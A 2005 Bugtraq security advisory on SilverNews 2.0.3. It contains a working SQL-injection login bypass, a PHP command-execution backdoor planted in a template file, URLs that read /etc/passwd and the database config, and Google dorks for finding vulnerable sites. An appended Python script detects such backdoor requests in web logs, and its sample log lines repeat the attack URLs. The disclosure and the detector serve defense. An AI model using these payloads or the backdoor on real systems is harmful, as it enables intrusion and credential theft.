Message-ID: <20050803161957.30221.qmail@securityfocus.com>
Date: 3 Aug 2005 16:19:57 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 (possibly previous versions ) SQL Injection /
 Login Bypass / Remote commands execution / cross site scripting


Silvernews 2.0.3 (possibly previous versions) SQL Injection / Login Bypass / Remote commands execution / cross site scripting

software:
author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews

SQL Injection / Login bypass:

A user can bypass the admin password check if magic_quotes is set to off:

user: ' or isnull(1/0) /*
pass: whatever


remote commands execution:

Now the new admin can edit the template: clicking on Templates -> Global footer,
they can add the lines:

//***********************************************
</body>
</html>

TEMPLATE;
}
}
system($HTTP_GET_VARS[command]);

/*

to leave a backdoor in the template file /templates/tpl_global.php.
They can now launch system commands on the target system with these URLs:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

to list directories

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd

to see /etc/passwd file

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php

to see Mysql database password (look inside html...)


cross site scripting:

In the same way, a user can hide evil JavaScript code in the template.


googledork: "Powered by SilverNews" 
or:         intitle:"SilverNews 2.0 Admin control panel" 


rgod
email: retrogod [at] aliceposta.it
site: http://rgod.altervista.org


original advisory: http://www.rgod.altervista.org/silvernews.html
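
A log check for the template backdoor described above, as an added example that is not part of the original advisory: it scans Apache combined-format access logs for direct requests to a PHP file under templates/ that carry query parameters. It generalizes from the advisory's "command" parameter to any parameter, because the parameter name is whatever was written into the template; the log lines are constructed samples and the function names are illustrative.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in Apache combined log format (not taken from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Aug/2005:16:01:12 +0000] "GET /news/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [03/Aug/2005:16:02:40 +0000] "GET /news//templates/tpl_global.php?command=ls%20-la HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.77 - - [03/Aug/2005:16:03:05 +0000] "GET /news/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd HTTP/1.1" 200 1490 "-" "Mozilla/5.0"
192.0.2.31 - - [03/Aug/2005:16:04:19 +0000] "GET /news/admin.php?action=templates HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Aug/2005:16:05:00 +0000] "GET /news/templates/tpl_global.php HTTP/1.1" 200 0 "-" "curl/7.14"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TEMPLATE_RE = re.compile(r"/templates/[^/]+\.php$")

def normalize_path(path):
    """Decode, collapse repeated slashes and lowercase, so that
    //templates/ and TPL_GLOBAL.PHP compare equal to the plain form."""
    return re.sub(r"/{2,}", "/", unquote(path)).lower()

def find_template_requests(log_text):
    """Return one finding per direct request to a template .php file
    that carries query parameters (templates are meant to be included,
    not requested with arguments)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, when, method, target, status = m.groups()
        # Split by hand: a target starting with "//" would confuse URL parsers.
        raw_path, _, query = target.partition("?")
        path = normalize_path(raw_path)
        if not TEMPLATE_RE.search(path):
            continue
        params = parse_qs(query, keep_blank_values=True)
        if not params:
            continue  # plain direct hit, no parameters passed
        findings.append({"ip": ip, "time": when, "method": method, "path": path,
                         "status": int(status),
                         "params": {k: v[0] for k, v in params.items()}})
    return findings

if __name__ == "__main__":
    for f in find_template_requests(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["params"])
```
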

